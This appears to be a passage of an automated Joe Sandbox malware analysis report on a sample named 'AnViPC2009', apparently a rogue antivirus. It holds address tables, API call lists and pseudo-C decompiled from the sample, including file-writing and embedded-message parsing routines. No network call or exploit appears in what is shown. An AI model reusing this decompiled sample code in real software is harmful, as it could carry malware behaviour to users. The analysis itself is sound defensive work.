                                                                                                                                                  0x0040c531
                                                                                                                                                  0x0040c4ff
                                                                                                                                                  0x0040c4ff
                                                                                                                                                  0x0040c4ff
                                                                                                                                                  0x0040c502
                                                                                                                                                  0x0040c517
                                                                                                                                                  0x0040c517
                                                                                                                                                  0x0040c51e
                                                                                                                                                  0x0040c51e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c51e
                                                                                                                                                  0x0040c504
                                                                                                                                                  0x0040c504
                                                                                                                                                  0x0040c504
                                                                                                                                                  0x0040c505
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c507
                                                                                                                                                  0x0040c507
                                                                                                                                                  0x0040c507
                                                                                                                                                  0x0040c508
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c50e
                                                                                                                                                  0x0040c50e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c50e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c57f
                                                                                                                                                  0x0040c57f
                                                                                                                                                  0x0040c583
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c589
                                                                                                                                                  0x0040c589
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c59b
                                                                                                                                                  0x0040c59b
                                                                                                                                                  0x0040c59f
                                                                                                                                                  0x0040c6fe
                                                                                                                                                  0x0040c6fe
                                                                                                                                                  0x0040c702
                                                                                                                                                  0x0040c708
                                                                                                                                                  0x0040c70f
                                                                                                                                                  0x0040c711
                                                                                                                                                  0x0040c711
                                                                                                                                                  0x0040c71b
                                                                                                                                                  0x0040c71b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c702
                                                                                                                                                  0x0040c5a5
                                                                                                                                                  0x0040c5b1
                                                                                                                                                  0x0040c5be
                                                                                                                                                  0x0040c5c3
                                                                                                                                                  0x0040c5c7
                                                                                                                                                  0x0040c5c9
                                                                                                                                                  0x0040c5d6
                                                                                                                                                  0x0040c5d6
                                                                                                                                                  0x0040c5d6
                                                                                                                                                  0x0040c5dc
                                                                                                                                                  0x0040c5e2
                                                                                                                                                  0x0040c5e3
                                                                                                                                                  0x0040c5e9
                                                                                                                                                  0x0040c5ea
                                                                                                                                                  0x0040c5eb
                                                                                                                                                  0x0040c5ed
                                                                                                                                                  0x0040c5f0
                                                                                                                                                  0x0040c5f6
                                                                                                                                                  0x0040c5f7
                                                                                                                                                  0x0040c5f9
                                                                                                                                                  0x0040c5fc
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c5d0
                                                                                                                                                  0x0040c5d0
                                                                                                                                                  0x0040c5d0
                                                                                                                                                  0x0040c5d0
                                                                                                                                                  0x0040c5d3
                                                                                                                                                  0x0040c5d3
                                                                                                                                                  0x0040c5fe
                                                                                                                                                  0x0040c60a
                                                                                                                                                  0x0040c610
                                                                                                                                                  0x0040c617
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c61d
                                                                                                                                                  0x0040c61d
                                                                                                                                                  0x0040c624
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c62a
                                                                                                                                                  0x0040c62c
                                                                                                                                                  0x0040c633
                                                                                                                                                  0x0040c63a
                                                                                                                                                  0x0040c63f
                                                                                                                                                  0x0040c641
                                                                                                                                                  0x0040c681
                                                                                                                                                  0x0040c681
                                                                                                                                                  0x0040c688
                                                                                                                                                  0x0040c691
                                                                                                                                                  0x0040c69d
                                                                                                                                                  0x0040c6ab
                                                                                                                                                  0x0040c6ab
                                                                                                                                                  0x0040c6b7
                                                                                                                                                  0x0040c6c5
                                                                                                                                                  0x0040c6cf
                                                                                                                                                  0x0040c6d6
                                                                                                                                                  0x0040c6dc
                                                                                                                                                  0x0040c6df
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c6e5
                                                                                                                                                  0x0040c6e5
                                                                                                                                                  0x0040c6e7
                                                                                                                                                  0x0040c6e7
                                                                                                                                                  0x0040c6ec
                                                                                                                                                  0x0040c6f3
                                                                                                                                                  0x0040c6f8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c6f8
                                                                                                                                                  0x0040c6df
                                                                                                                                                  0x0040c643
                                                                                                                                                  0x0040c643
                                                                                                                                                  0x0040c645
                                                                                                                                                  0x0040c64c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c64e
                                                                                                                                                  0x0040c64e
                                                                                                                                                  0x0040c64e
                                                                                                                                                  0x0040c656
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c658
                                                                                                                                                  0x0040c658
                                                                                                                                                  0x0040c659
                                                                                                                                                  0x0040c661
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c663
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c663
                                                                                                                                                  0x0040c665
                                                                                                                                                  0x0040c66d
                                                                                                                                                  0x0040c674
                                                                                                                                                  0x0040c679
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c727
                                                                                                                                                  0x0040c727
                                                                                                                                                  0x0040c72b
                                                                                                                                                  0x0040c72d
                                                                                                                                                  0x0040c734
                                                                                                                                                  0x0040c740
                                                                                                                                                  0x0040c740
                                                                                                                                                  0x0040c746
                                                                                                                                                  0x0040c74e
                                                                                                                                                  0x0040c74e
                                                                                                                                                  0x0040c753
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c75f
                                                                                                                                                  0x0040c75f
                                                                                                                                                  0x0040c763
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c769
                                                                                                                                                  0x0040c769
                                                                                                                                                  0x0040c58b
                                                                                                                                                  0x0040c591
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c9ff
                                                                                                                                                  0x0040c9ff
                                                                                                                                                  0x0040ca03
                                                                                                                                                  0x0040ca05
                                                                                                                                                  0x0040ca05
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c53d
                                                                                                                                                  0x0040c53d
                                                                                                                                                  0x0040c545
                                                                                                                                                  0x0040c54a
                                                                                                                                                  0x0040c54d
                                                                                                                                                  0x0040c573
                                                                                                                                                  0x0040c54f
                                                                                                                                                  0x0040c54f
                                                                                                                                                  0x0040c552
                                                                                                                                                  0x0040c567
                                                                                                                                                  0x0040c554
                                                                                                                                                  0x0040c554
                                                                                                                                                  0x0040c55b
                                                                                                                                                  0x0040c55b
                                                                                                                                                  0x0040c552
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bfe1
                                                                                                                                                  0x0040bfe5
                                                                                                                                                  0x0040bfea
                                                                                                                                                  0x0040bff1
                                                                                                                                                  0x0040bff1
                                                                                                                                                  0x0040bff4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bff6
                                                                                                                                                  0x0040bff6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bff6
                                                                                                                                                  0x0040bff4
                                                                                                                                                  0x0040ca3e
                                                                                                                                                  0x0040ca3e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c96c
                                                                                                                                                  0x0040c95d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c7de

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 0040A229: OemToCharBuffA.USER32 ref: 0040A237
                                                                                                                                                    • Part of subcall function 0040A229: CharUpperA.USER32(00000000,?,?,0040B516,?,00000000,00000000,?,00000000,00000000), ref: 0040A242
                                                                                                                                                    • Part of subcall function 0040A229: CharToOemBuffA.USER32 ref: 0040A255
                                                                                                                                                  • SHChangeNotify.SHELL32(00001000,00000001,00000000,00000000), ref: 0040C9F7
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Char$Buff$ChangeNotifyUpper
                                                                                                                                                  • String ID: $"$.lnk$/$/
                                                                                                                                                  • API String ID: 3722132714-4221205064
                                                                                                                                                  • Opcode ID: c55b7e8dda2562b24a93f1718546e23da6adaab37b26da7acaf48b5a52746ddb
                                                                                                                                                  • Instruction ID: a4d3239ebe4490c6aff351d4846f84b65a7147a2e5ed10d2cb0a18c9f290a8ce
                                                                                                                                                  • Opcode Fuzzy Hash: c55b7e8dda2562b24a93f1718546e23da6adaab37b26da7acaf48b5a52746ddb
                                                                                                                                                  • Instruction Fuzzy Hash: 0171617290525CA9EB21E7B0CD85FDAB7BC9B44304F0445E7A148F61C2DB78AB88CF59
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1428 40554c-405557 1429 40564c-40564e 1428->1429 1430 40555d-405562 1428->1430 1431 405564-405565 1430->1431 1432 405579-405580 1430->1432 1433 405567-405568 1431->1433 1434 40556e 1431->1434 1435 405581-405589 1432->1435 1433->1432 1436 40556a-40556c 1433->1436 1437 405570-405576 GetStdHandle 1434->1437 1438 4055c8-4055dd WriteFile 1435->1438 1439 40558b-40558e 1435->1439 1436->1437 1437->1432 1440 4055df-4055e1 1438->1440 1441 405590-40559c 1439->1441 1442 4055e3-4055e7 1439->1442 1440->1442 1443 405646-40564b 1440->1443 1445 4055a0-4055b9 WriteFile 1441->1445 1446 40559e 1441->1446 1442->1443 1444 4055e9-4055ed 1442->1444 1443->1429 1444->1443 1447 4055ef-405603 call 4032c5 1444->1447 1445->1442 1448 4055bb-4055c4 1445->1448 1446->1445 1452 405605-40560b 1447->1452 1453 405639-405641 call 403432 1447->1453 1448->1441 1449 4055c6 1448->1449 1449->1440 1452->1435 1455 405611-405613 1452->1455 1453->1443 1455->1435 1456 405619-405634 call 404fa3 call 4054b4 1455->1456 1456->1435
                                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                                  			E0040554C(void* __ecx, void* __edx, void* _a4, long _a8) {
                                                                                                                                                  				char _v8;
                                                                                                                                                  				void* _t24;
                                                                                                                                                  				int _t26;
                                                                                                                                                  				long _t32;
                                                                                                                                                  				int _t35;
                                                                                                                                                  				void* _t38;
                                                                                                                                                  				void* _t40;
                                                                                                                                                  				long _t48;
                                                                                                                                                  				void* _t53;
                                                                                                                                                  				struct _OVERLAPPED* _t55;
                                                                                                                                                  				void* _t60;
                                                                                                                                                  
                                                                                                                                                  				_t53 = __edx;
                                                                                                                                                  				_push(__ecx);
                                                                                                                                                  				_t60 = __ecx;
                                                                                                                                                  				if(_a8 == 0) {
                                                                                                                                                  					L25:
                                                                                                                                                  					return _t24;
                                                                                                                                                  				}
                                                                                                                                                  				_t24 =  *(__ecx + 0xc);
                                                                                                                                                  				if(_t24 == 0) {
                                                                                                                                                  					L7:
                                                                                                                                                  					while(1) {
                                                                                                                                                  						_t55 = 0;
                                                                                                                                                  						_v8 = 0;
                                                                                                                                                  						if( *((intOrPtr*)(_t60 + 0xc)) == 0) {
                                                                                                                                                  							goto L15;
                                                                                                                                                  						}
                                                                                                                                                  						if(_a8 <= 0) {
                                                                                                                                                  							L17:
                                                                                                                                                  							if( *((char*)(_t60 + 0x14)) == 0 ||  *((intOrPtr*)(_t60 + 0xc)) != 0) {
                                                                                                                                                  								L24:
                                                                                                                                                  								 *((char*)(_t60 + 8)) = 1;
                                                                                                                                                  								goto L25;
                                                                                                                                                  							} else {
                                                                                                                                                  								_push(0);
                                                                                                                                                  								_t18 = _t60 + 0x17; // 0x17
                                                                                                                                                  								if(E004032C5(0x414c7c, _t18) == 0) {
                                                                                                                                                  									_t22 = _t60 + 0x17; // 0x17
                                                                                                                                                  									_t24 = E00403432(0x414c7c, 0, _t22);
                                                                                                                                                  									goto L24;
                                                                                                                                                  								}
                                                                                                                                                  								_t19 =  &_v8; // 0x9454529
                                                                                                                                                  								_t24 =  *_t19;
                                                                                                                                                  								if(_t24 < _a8 && _t24 > 0) {
                                                                                                                                                  									_t38 = E00404FA3(_t60, _t53);
                                                                                                                                                  									_t21 =  &_v8; // 0x9454529
                                                                                                                                                  									asm("sbb edx, edi");
                                                                                                                                                  									_t24 = E004054B4(_t60, _t38 -  *_t21, _t53, 0);
                                                                                                                                                  								}
                                                                                                                                                  								continue;
                                                                                                                                                  							}
                                                                                                                                                  						} else {
                                                                                                                                                  							goto L10;
                                                                                                                                                  						}
                                                                                                                                                  						while(1) {
                                                                                                                                                  							L10:
                                                                                                                                                  							_t48 = _a8 - _t55;
                                                                                                                                                  							_t32 = 0x4000;
                                                                                                                                                  							if(_t48 < 0x4000) {
                                                                                                                                                  								_t32 = _t48;
                                                                                                                                                  							}
                                                                                                                                                  							_t8 =  &_v8; // 0x9454529
                                                                                                                                                  							_t35 = WriteFile( *(_t60 + 4), _a4 + _t55, _t32, _t8, 0);
                                                                                                                                                  							asm("sbb al, al");
                                                                                                                                                  							_t24 =  ~(_t35 - 1) + 1;
                                                                                                                                                  							if(_t24 == 0) {
                                                                                                                                                  								goto L17;
                                                                                                                                                  							}
                                                                                                                                                  							_t55 = _t55 + 0x4000;
                                                                                                                                                  							if(_t55 < _a8) {
                                                                                                                                                  								continue;
                                                                                                                                                  							}
                                                                                                                                                  							L16:
                                                                                                                                                  							if(_t24 != 0) {
                                                                                                                                                  								goto L24;
                                                                                                                                                  							}
                                                                                                                                                  							goto L17;
                                                                                                                                                  						}
                                                                                                                                                  						goto L17;
                                                                                                                                                  						L15:
                                                                                                                                                  						_t12 =  &_v8; // 0x9454529
                                                                                                                                                  						_t26 = WriteFile( *(_t60 + 4), _a4, _a8, _t12, 0); // executed
                                                                                                                                                  						asm("sbb al, al");
                                                                                                                                                  						_t24 =  ~(_t26 - 1) + 1;
                                                                                                                                                  						goto L16;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				_t40 = _t24 - 1;
                                                                                                                                                  				if(_t40 == 0) {
                                                                                                                                                  					_t24 = GetStdHandle(0xfffffff5);
                                                                                                                                                  					L6:
                                                                                                                                                  					 *(_t60 + 4) = _t24;
                                                                                                                                                  					goto L7;
                                                                                                                                                  				}
                                                                                                                                                  				_t24 = _t40 - 1;
                                                                                                                                                  				if(_t24 != 0) {
                                                                                                                                                  					goto L7;
                                                                                                                                                  				}
                                                                                                                                                  				_t24 = GetStdHandle(0xfffffff4);
                                                                                                                                                  				goto L6;
                                                                                                                                                  			}














                                                                                                                                                  0x0040554c
                                                                                                                                                  0x0040554f
                                                                                                                                                  0x00405555
                                                                                                                                                  0x00405557
                                                                                                                                                  0x0040564c
                                                                                                                                                  0x0040564e
                                                                                                                                                  0x0040564e
                                                                                                                                                  0x0040555d
                                                                                                                                                  0x00405562
                                                                                                                                                  0x00405579
                                                                                                                                                  0x00405581
                                                                                                                                                  0x00405581
                                                                                                                                                  0x00405583
                                                                                                                                                  0x00405589
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040558e
                                                                                                                                                  0x004055e3
                                                                                                                                                  0x004055e7
                                                                                                                                                  0x00405646
                                                                                                                                                  0x00405647
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004055ef
                                                                                                                                                  0x004055ef
                                                                                                                                                  0x004055f1
                                                                                                                                                  0x00405603
                                                                                                                                                  0x00405639
                                                                                                                                                  0x00405641
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405641
                                                                                                                                                  0x00405605
                                                                                                                                                  0x00405605
                                                                                                                                                  0x0040560b
                                                                                                                                                  0x0040561d
                                                                                                                                                  0x00405622
                                                                                                                                                  0x00405629
                                                                                                                                                  0x0040562f
                                                                                                                                                  0x0040562f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040560b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405590
                                                                                                                                                  0x00405590
                                                                                                                                                  0x00405593
                                                                                                                                                  0x00405595
                                                                                                                                                  0x0040559c
                                                                                                                                                  0x0040559e
                                                                                                                                                  0x0040559e
                                                                                                                                                  0x004055a2
                                                                                                                                                  0x004055b0
                                                                                                                                                  0x004055b5
                                                                                                                                                  0x004055b7
                                                                                                                                                  0x004055b9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004055bb
                                                                                                                                                  0x004055c4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004055df
                                                                                                                                                  0x004055e1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004055e1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004055c8
                                                                                                                                                  0x004055c9
                                                                                                                                                  0x004055d6
                                                                                                                                                  0x004055db
                                                                                                                                                  0x004055dd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004055dd
                                                                                                                                                  0x00405581
                                                                                                                                                  0x00405564
                                                                                                                                                  0x00405565
                                                                                                                                                  0x00405570
                                                                                                                                                  0x00405570
                                                                                                                                                  0x00405576
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405576
                                                                                                                                                  0x00405567
                                                                                                                                                  0x00405568
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405570
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • GetStdHandle.KERNEL32(000000F5,?,00000000,?,00409229,?,?,00000000,?,?,0040EAF3,?,?,09454529,?,?), ref: 00405570
                                                                                                                                                  • WriteFile.KERNEL32(?,?,00004000,)EE*)))*))),00000000,00000000,?,00000000,00000017,00000000,?,00409229,?,?,00000000,?), ref: 004055B0
                                                                                                                                                  • WriteFile.KERNELBASE(?,?,00000000,)EE*)))*))),00000000,?,?,?,00000000,?,00409229,?,?,00000000,?,?), ref: 004055D6
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileWrite$Handle
                                                                                                                                                  • String ID: )EE*)))*)))$|LA
                                                                                                                                                  • API String ID: 4209713984-4270601557
                                                                                                                                                  • Opcode ID: d0f5307994a851aab7f8effd121e9e883381f2cf68b18a31f753ad1ba08ddf47
                                                                                                                                                  • Instruction ID: a94dca9ab147bf10715a5b3709b3ea92a05abf6cee8c8b8595d3f968f1ce7832
                                                                                                                                                  • Opcode Fuzzy Hash: d0f5307994a851aab7f8effd121e9e883381f2cf68b18a31f753ad1ba08ddf47
                                                                                                                                                  • Instruction Fuzzy Hash: 3931C171600904BBDF20CE25CD44BBB77AAEB81710F10853BA516E72C4D678AD05CF59
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1461 40926c-40927f call 401200 1464 409286-40928e 1461->1464 1465 409281 call 40a386 1461->1465 1466 409290-4092ae GetModuleFileNameA call 40a3b2 1464->1466 1467 4092b5-4092e4 call 40a450 call 404e8a call 40505e 1464->1467 1465->1464 1473 4094a3-4094a5 1466->1473 1474 4092b4 1466->1474 1478 4092f6-4092fd 1467->1478 1479 4092e6-4092f1 call 40503b 1467->1479 1474->1467 1480 4092fe-409302 1478->1480 1487 4094a2 1479->1487 1482 409308-409328 call 404fa3 call 405651 1480->1482 1483 4093da-409407 call 4054b4 call 40a1c5 1480->1483 1493 40932d-409333 1482->1493 1494 409496-4094a1 call 40503b 1483->1494 1495 40940d-40942a call 405651 1483->1495 1487->1473 1493->1494 1496 409339 1493->1496 1494->1487 1507 40942c-409435 1495->1507 1508 40948d-409493 1495->1508 1499 40933b-409345 1496->1499 1500 409347-40934f 1499->1500 1501 409369-40936c 1499->1501 1500->1501 1504 409351-409367 call 40a516 1500->1504 1505 409394-40939d 1501->1505 1506 40936e-409376 1501->1506 1504->1501 1518 4093a1-4093a6 1504->1518 1505->1499 1512 40939f 1505->1512 1506->1505 1510 409378-40938e call 40a516 1506->1510 1507->1508 1511 409437-40943a 1507->1511 1508->1494 1510->1494 1510->1505 1515 409477-40947a 1511->1515 1516 40943c-409443 1511->1516 1517 4093a9-4093ca call 4054b4 1512->1517 1519 409481-409483 1515->1519 1520 40947c-40947f 1515->1520 1522 409470 1516->1522 1523 409445-409448 1516->1523 1517->1480 1533 4093d0-4093d4 1517->1533 1518->1517 1526 409484 1519->1526 1520->1519 1520->1526 1525 409474-409475 1522->1525 1527 40946a-40946e 1523->1527 1528 40944a-40944d 1523->1528 1530 409487-40948b 1525->1530 1526->1530 1527->1525 1531 409464-409468 1528->1531 1532 40944f-409452 1528->1532 1530->1507 1530->1508 1531->1525 1534 409454-409456 1532->1534 1535 40945e-409462 1532->1535 1533->1483 1533->1494 1534->1526 1536 409458-40945c 1534->1536 1535->1525 1536->1525
                                                                                                                                                  C-Code - Quality: 88%
                                                                                                                                                  			E0040926C(char __ebx, intOrPtr* __ecx, void* __edx, void* __esi, void* __eflags, signed int _a4) {
                                                                                                                                                  				char _v8;
                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                  				char _v1040;
                                                                                                                                                  				char _v4144;
                                                                                                                                                  				char _v12336;
                                                                                                                                                  				void* _t65;
                                                                                                                                                  				void* _t70;
                                                                                                                                                  				intOrPtr _t75;
                                                                                                                                                  				void* _t76;
                                                                                                                                                  				intOrPtr _t77;
                                                                                                                                                  				intOrPtr _t79;
                                                                                                                                                  				intOrPtr _t80;
                                                                                                                                                  				intOrPtr _t82;
                                                                                                                                                  				char _t95;
                                                                                                                                                  				intOrPtr _t104;
                                                                                                                                                  				void* _t110;
                                                                                                                                                  				char _t111;
                                                                                                                                                  				void* _t116;
                                                                                                                                                  				void* _t117;
                                                                                                                                                  				void* _t118;
                                                                                                                                                  				void* _t119;
                                                                                                                                                  				void* _t122;
                                                                                                                                                  				intOrPtr* _t125;
                                                                                                                                                  				void* _t127;
                                                                                                                                                  
                                                                                                                                                  				_t110 = __edx;
                                                                                                                                                  				_t97 = __ecx;
                                                                                                                                                  				_t95 = __ebx;
                                                                                                                                                  				E00401200(0x302c);
                                                                                                                                                  				 *((intOrPtr*)(__esi + 0x6a))();
                                                                                                                                                  				_push(_a4);
                                                                                                                                                  				_t125 = __ecx;
                                                                                                                                                  				_t65 = E0040A386();
                                                                                                                                                  				_t66 =  &_v1040;
                                                                                                                                                  				if(_t65 != 0) {
                                                                                                                                                  					L4:
                                                                                                                                                  					E0040A450(_t66, _a4);
                                                                                                                                                  					E00404E8A( &_v4144);
                                                                                                                                                  					_t70 = E0040505E( &_v4144,  &_v1040, 0, 1, 0); // executed
                                                                                                                                                  					if(_t70 != 0) {
                                                                                                                                                  						_a4 = _a4 | 0xffffffff;
                                                                                                                                                  						_v8 = 0;
                                                                                                                                                  						_push(_t95);
                                                                                                                                                  						L7:
                                                                                                                                                  						while(_a4 == 0xffffffff) {
                                                                                                                                                  							_t80 = E00404FA3( &_v4144, _t110); // executed
                                                                                                                                                  							_v12 = _t80;
                                                                                                                                                  							_t82 = E00405651( &_v4144, _t110,  &_v12336, 0x2000); // executed
                                                                                                                                                  							_v16 = _t82;
                                                                                                                                                  							if(_t82 >= 0x10) {
                                                                                                                                                  								_t122 = 0;
                                                                                                                                                  								while(1) {
                                                                                                                                                  									_t95 = _t127 + _t122 - 0x302c;
                                                                                                                                                  									if( *_t95 == 0x2a &&  *((char*)(_t127 + _t122 - 0x302b)) == 0x2a && E0040A516(_t127 + _t122 - 0x302a, "*messages***", 0xb) == 0) {
                                                                                                                                                  										break;
                                                                                                                                                  									}
                                                                                                                                                  									if( *_t95 != 0x52 ||  *((char*)(_t127 + _t122 - 0x302b)) != 0x61 || E0040A516(_t127 + _t122 - 0x302a, 0x412580, 4) != 0) {
                                                                                                                                                  										_t122 = _t122 + 1;
                                                                                                                                                  										if(_t122 <= _v16 + 0xfffffff0) {
                                                                                                                                                  											continue;
                                                                                                                                                  										} else {
                                                                                                                                                  											L19:
                                                                                                                                                  											E004054B4( &_v4144, _v16 + _v12 - 0x10, 0, 0);
                                                                                                                                                  											_v8 = _v8 + 1;
                                                                                                                                                  											if(_v8 < 0x40) {
                                                                                                                                                  												goto L7;
                                                                                                                                                  											} else {
                                                                                                                                                  												if(_a4 != 0xffffffff) {
                                                                                                                                                  													goto L21;
                                                                                                                                                  												}
                                                                                                                                                  											}
                                                                                                                                                  										}
                                                                                                                                                  									}
                                                                                                                                                  									goto L42;
                                                                                                                                                  								}
                                                                                                                                                  								_a4 = _t122 + _v12;
                                                                                                                                                  								goto L19;
                                                                                                                                                  							}
                                                                                                                                                  							L42:
                                                                                                                                                  							_t76 = E0040503B(_t95,  &_v4144);
                                                                                                                                                  							goto L43;
                                                                                                                                                  						}
                                                                                                                                                  						L21:
                                                                                                                                                  						asm("cdq");
                                                                                                                                                  						_t95 = 0;
                                                                                                                                                  						 *((intOrPtr*)(_t125 + 4)) = 0x20000;
                                                                                                                                                  						E004054B4( &_v4144, _a4, _t110, 0);
                                                                                                                                                  						_t75 = E0040A1C5( *((intOrPtr*)(_t125 + 4)) + 0x400);
                                                                                                                                                  						 *_t125 = _t75;
                                                                                                                                                  						if(_t75 != 0) {
                                                                                                                                                  							 *((char*)(_t75 +  *((intOrPtr*)(_t125 + 4)))) = 0;
                                                                                                                                                  							_t77 = E00405651( &_v4144, _t110,  *_t125,  *((intOrPtr*)(_t125 + 4)));
                                                                                                                                                  							_t104 = 0;
                                                                                                                                                  							 *((intOrPtr*)(_t125 + 4)) = _t77;
                                                                                                                                                  							if(_t77 > 0) {
                                                                                                                                                  								while(1) {
                                                                                                                                                  									_t79 =  *_t125;
                                                                                                                                                  									_t111 =  *((char*)(_t79 + _t95));
                                                                                                                                                  									_t95 = _t95 + 1;
                                                                                                                                                  									if(_t111 == 0) {
                                                                                                                                                  										goto L41;
                                                                                                                                                  									}
                                                                                                                                                  									if(_t111 != 0x5c) {
                                                                                                                                                  										if(_t111 == 0xd || _t111 == 0xa) {
                                                                                                                                                  											_t111 = 0xc;
                                                                                                                                                  										}
                                                                                                                                                  										goto L39;
                                                                                                                                                  									} else {
                                                                                                                                                  										_t116 =  *((char*)(_t79 + _t95)) - 0x22;
                                                                                                                                                  										if(_t116 == 0) {
                                                                                                                                                  											 *((char*)(_t79 + _t104)) = 0x22;
                                                                                                                                                  											goto L35;
                                                                                                                                                  										} else {
                                                                                                                                                  											_t117 = _t116 - 0x3a;
                                                                                                                                                  											if(_t117 == 0) {
                                                                                                                                                  												 *((char*)(_t79 + _t104)) = 0x5c;
                                                                                                                                                  												goto L35;
                                                                                                                                                  											} else {
                                                                                                                                                  												_t118 = _t117 - 0x12;
                                                                                                                                                  												if(_t118 == 0) {
                                                                                                                                                  													 *((char*)(_t79 + _t104)) = 0xa;
                                                                                                                                                  													goto L35;
                                                                                                                                                  												} else {
                                                                                                                                                  													_t119 = _t118 - 4;
                                                                                                                                                  													if(_t119 == 0) {
                                                                                                                                                  														 *((char*)(_t79 + _t104)) = 0xd;
                                                                                                                                                  														goto L35;
                                                                                                                                                  													} else {
                                                                                                                                                  														if(_t119 != 0) {
                                                                                                                                                  															L39:
                                                                                                                                                  															 *((char*)(_t79 + _t104)) = _t111;
                                                                                                                                                  														} else {
                                                                                                                                                  															 *((char*)(_t79 + _t104)) = 9;
                                                                                                                                                  															L35:
                                                                                                                                                  															_t95 = _t95 + 1;
                                                                                                                                                  														}
                                                                                                                                                  													}
                                                                                                                                                  												}
                                                                                                                                                  											}
                                                                                                                                                  										}
                                                                                                                                                  									}
